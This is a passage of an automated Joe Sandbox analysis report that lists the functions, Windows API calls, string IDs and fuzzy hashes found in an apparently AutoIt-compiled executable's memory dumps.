                                                      • Part of subcall function 0061FEC6: _wcscpy.LIBCMT ref: 0061FEE9
                                                    • GetProcessId.KERNEL32(00000000), ref: 0067F8E1
                                                    • CloseHandle.KERNEL32(00000000), ref: 0067F910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
                                                    • Opcode ID: 095214d948cce3a9e26ac9488e1a037bd4ef05610ab7ed1f9f10b017e24a37ab
                                                    • Instruction ID: 929f0b3ff57d2945104bbc3b0f7646770af23b87c680c61e6d172433e3ebf9bb
                                                    • Opcode Fuzzy Hash: 095214d948cce3a9e26ac9488e1a037bd4ef05610ab7ed1f9f10b017e24a37ab
                                                    • Instruction Fuzzy Hash: B7616D75A00619DFCB18DF98C5819AEBBF6FF48310B14856DE85AAB391CB30AD41CF94
                                                    Function 0066145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 0066149C
                                                    • GetKeyboardState.USER32(?), ref: 006614B1
                                                    • SetKeyboardState.USER32(?), ref: 00661512
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00661540
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0066155F
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006615A5
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006615C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                    • Instruction ID: 11415e93c7e484c89d3de94f35ad18fcea33638e63de2320732675845bad1a53
                                                    • Opcode Fuzzy Hash: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                    • Instruction Fuzzy Hash: 3151D0A0A046D53EFB324634CC45BFABEAB5B47304F0C8589E1D68A9D2C694EC84D7A0
                                                    Function 00661276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 006612B5
                                                    • GetKeyboardState.USER32(?), ref: 006612CA
                                                    • SetKeyboardState.USER32(?), ref: 0066132B
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00661357
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00661374
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006613B8
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006613D9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                    • Instruction ID: 421905fc11b38330eb8f1a1fb52c722ce4b769a6fca904d09d5c88159f4dec1f
                                                    • Opcode Fuzzy Hash: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                    • Instruction Fuzzy Hash: D551F3A09047D53DFB3287248C55BBABFAB9B07300F0C8589E1D59EAC2D795AC94E760
                                                    Function 0066589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$LocalTime
                                                    • String ID:
                                                    • API String ID: 2945705084-0
                                                    • Opcode ID: 51ca4c019871a2142cb2008dedc7d4f8f6040ad6c52fe3e0bcc67347515f011d
                                                    • Instruction ID: 9363729d310008c3e67f4d7f6bbfc1502bb8c319baf0f43b758350b2e73da4bd
                                                    • Opcode Fuzzy Hash: 51ca4c019871a2142cb2008dedc7d4f8f6040ad6c52fe3e0bcc67347515f011d
                                                    • Instruction Fuzzy Hash: 4841B565C2092476CB50EBF49C869CF73AAAF05310F50895AF515E3221E734E754CBAD
                                                    Function 0065DA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065DAC5
                                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0065DAFB
                                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0065DB0C
                                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0065DB8E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                                    • String ID: ,,i$DllGetClassObject
                                                    • API String ID: 753597075-1121700710
                                                    • Opcode ID: 39e6d19a27c2d5f93fea58ef037add4f97ee4b9309d7cddb25fea0956cdd140d
                                                    • Instruction ID: 8ab1e0012fecb7a58d329ef2093ff32c2c697a59f66681ebf8a5a42c8a452271
                                                    • Opcode Fuzzy Hash: 39e6d19a27c2d5f93fea58ef037add4f97ee4b9309d7cddb25fea0956cdd140d
                                                    • Instruction Fuzzy Hash: A34182B1600209EFDB25CF54C884AAA7BBBEF44311F1581ADED059F285D7B1DE48CBA0
                                                    Function 006638AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006638D3,?), ref: 006648C7
                                                      • Part of subcall function 006648AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006638D3,?), ref: 006648E0
                                                    • lstrcmpiW.KERNEL32(?,?), ref: 006638F3
                                                    • _wcscmp.LIBCMT ref: 0066390F
                                                    • MoveFileW.KERNEL32(?,?), ref: 00663927
                                                    • _wcscat.LIBCMT ref: 0066396F
                                                    • SHFileOperationW.SHELL32(?), ref: 006639DB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                    • String ID: \*.*
                                                    • API String ID: 1377345388-1173974218
                                                    • Opcode ID: d4d0a2005faaf86bb97fa9488c40b49254d711b05c536632f5d3a8019f0b3c9f
                                                    • Instruction ID: db5ec841cf54afb6337dc5a6d44881da2be88859708bafd9ee2630fb9d8b150a
                                                    • Opcode Fuzzy Hash: d4d0a2005faaf86bb97fa9488c40b49254d711b05c536632f5d3a8019f0b3c9f
                                                    • Instruction Fuzzy Hash: 8D419371508394AED791EF64D4419EFB7E9AF89340F00092EB48AC3251EB75D688CB56
                                                    Function 00687500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00687519
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006875C0
                                                    • IsMenu.USER32(?), ref: 006875D8
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00687620
                                                    • DrawMenuBar.USER32 ref: 00687633
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                    • String ID: 0
                                                    • API String ID: 3866635326-4108050209
                                                    • Opcode ID: c1f88baf8fbc87214efc38281e0616dad1ef7f8d5c9f88439a3cee0f74af88fa
                                                    • Instruction ID: aec932ce3f03ee857b653739d100c42b01abdb750061f6c7c65df903764da812
                                                    • Opcode Fuzzy Hash: c1f88baf8fbc87214efc38281e0616dad1ef7f8d5c9f88439a3cee0f74af88fa
                                                    • Instruction Fuzzy Hash: 4A41F675A05609AFDB20EF54D884EEABBBAFB04314F148229F955A7350D730ED50CFA1
                                                    Function 0068122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0068125C
                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00681286
                                                    • FreeLibrary.KERNEL32(00000000), ref: 0068133D
                                                      • Part of subcall function 0068122D: RegCloseKey.ADVAPI32(?), ref: 006812A3
                                                      • Part of subcall function 0068122D: FreeLibrary.KERNEL32(?), ref: 006812F5
                                                      • Part of subcall function 0068122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00681318
                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 006812E0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                    • String ID:
                                                    • API String ID: 395352322-0
                                                    • Opcode ID: 5da77452a78b52d00c089775551a188228bf59b8255b3a0a57b033341e128871
                                                    • Instruction ID: 45c3da39c47c521e72a5d5f4cc23732c77099f68a233c6fb0138e7aecf5e0b80
                                                    • Opcode Fuzzy Hash: 5da77452a78b52d00c089775551a188228bf59b8255b3a0a57b033341e128871
                                                    • Instruction Fuzzy Hash: 28312DB1901109BFDB14AB90DC99EFEB7BDEF09300F10026AE505E6251DA749F869BA0
                                                    Function 0068653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0068655B
                                                    • GetWindowLongW.USER32(01315678,000000F0), ref: 0068658E
                                                    • GetWindowLongW.USER32(01315678,000000F0), ref: 006865C3
                                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 006865F5
                                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0068661F
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00686630
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0068664A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$MessageSend
                                                    • String ID:
                                                    • API String ID: 2178440468-0
                                                    • Opcode ID: d14826cecd9c48d12141e7e609f2eec3f6d9834f355e6be8708bceb11746c723
                                                    • Instruction ID: 7370aed6c02679e79ed22f52ea7900e2c2cef711dfd70c1ad839d08f7156a8fb
                                                    • Opcode Fuzzy Hash: d14826cecd9c48d12141e7e609f2eec3f6d9834f355e6be8708bceb11746c723
                                                    • Instruction Fuzzy Hash: 62310670644150AFDB20DF18DC89FA537E2FB4A710F191268F511DB2B6DB71AC80DB66
                                                    Function 00676486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 006780A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006780CB
                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006764D9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 006764E8
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676521
                                                    • connect.WSOCK32(00000000,?,00000010), ref: 0067652A
                                                    • WSAGetLastError.WSOCK32 ref: 00676534
                                                    • closesocket.WSOCK32(00000000), ref: 0067655D
                                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676576
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                    • String ID:
                                                    • API String ID: 910771015-0
                                                    • Opcode ID: 43100e792f1e9302c856a70dc0cf1a9b545f5613058f05b24b869f1229170f40
                                                    • Instruction ID: 7b0faf73b359939d33887efce0601bab284af3207f4f2c6d526a23d376bd259c
                                                    • Opcode Fuzzy Hash: 43100e792f1e9302c856a70dc0cf1a9b545f5613058f05b24b869f1229170f40
                                                    • Instruction Fuzzy Hash: D031B171600618AFEB10AF24DC85BBE7BBBEB44714F048129FD0997291DB70AD05DBA1
                                                    Function 0065E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E0FA
                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065E120
                                                    • SysAllocString.OLEAUT32(00000000), ref: 0065E123
                                                    • SysAllocString.OLEAUT32 ref: 0065E144
                                                    • SysFreeString.OLEAUT32 ref: 0065E14D
                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0065E167
                                                    • SysAllocString.OLEAUT32(?), ref: 0065E175
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                    • String ID:
                                                    • API String ID: 3761583154-0
                                                    • Opcode ID: 143f7c059ef8969242bb38e61a09f0ec4db33ed76f16759488c42454d87e1e7c
                                                    • Instruction ID: 40f92b77895222ab9a36c3dba0ab5a49c699625b87b1f311bb22923354f6dbb9
                                                    • Opcode Fuzzy Hash: 143f7c059ef8969242bb38e61a09f0ec4db33ed76f16759488c42454d87e1e7c
                                                    • Instruction Fuzzy Hash: 9321C475200508BF9F249FA8DC88CAB77EEEB09760B108225FD54CB2A1DA71DD458B64
                                                    Function 0065FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                    • API String ID: 1038674560-2734436370
                                                    • Opcode ID: 7ca22a830a4215522b1ce158b5eebc09073768b83423870ecb53cd85ef5eb608
                                                    • Instruction ID: 8b0dfd1664a3e5bf54f09cf208c5fea66cafce775ae43f4cdafd31414ef39e72
                                                    • Opcode Fuzzy Hash: 7ca22a830a4215522b1ce158b5eebc09073768b83423870ecb53cd85ef5eb608
                                                    • Instruction Fuzzy Hash: CC217972204665A6D330A730ED22FE7739FEF21301F144039FC8687281EB51AD8AD299
                                                    Function 0068783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
                                                      • Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
                                                      • Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91
                                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006878A1
                                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006878AE
                                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006878B9
                                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006878C8
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006878D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CreateObjectStockWindow
                                                    • String ID: Msctls_Progress32
                                                    • API String ID: 1025951953-3636473452
                                                    • Opcode ID: a5c24e37f05b05b322eb23c1f94e30bd2e2dc496a8fe9e2ab860b2ef12e57498
                                                    • Instruction ID: e6f412c0796d3cfe28fff288663940fdf08d6f109dba5504a4ff6f787448b177
                                                    • Opcode Fuzzy Hash: a5c24e37f05b05b322eb23c1f94e30bd2e2dc496a8fe9e2ab860b2ef12e57498
                                                    • Instruction Fuzzy Hash: B21190B2150219BFEF159F60CC85EE77F6EEF08758F115224BA04A6090CB72AC21DBA4
                                                    Function 006241C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00624292,?), ref: 006241E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 006241EA
                                                    • EncodePointer.KERNEL32(00000000), ref: 006241F6
                                                    • DecodePointer.KERNEL32(00000001,00624292,?), ref: 00624213
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoInitialize$combase.dll
                                                    • API String ID: 3489934621-340411864
                                                    • Opcode ID: 7e05ed706453a5a14a932c9378e99eeb1567c150d77c172afd4e92504022cccf
                                                    • Instruction ID: d599f98c4e483111ee0846dae824715235dd760f16e33a37826437a5ba44e5d9
                                                    • Opcode Fuzzy Hash: 7e05ed706453a5a14a932c9378e99eeb1567c150d77c172afd4e92504022cccf
                                                    • Instruction Fuzzy Hash: A0E01AB0691301BFEF219BB1EC2DF743AABBB20B02F156524F551E59A0DFB540959F40
                                                    Function 0062429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006241B8), ref: 006242B8
                                                    • GetProcAddress.KERNEL32(00000000), ref: 006242BF
                                                    • EncodePointer.KERNEL32(00000000), ref: 006242CA
                                                    • DecodePointer.KERNEL32(006241B8), ref: 006242E5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                    • String ID: RoUninitialize$combase.dll
                                                    • API String ID: 3489934621-2819208100
                                                    • Opcode ID: ac0f19f43787379e074130e7828b8be381768330a8e836083ea518020a2299b0
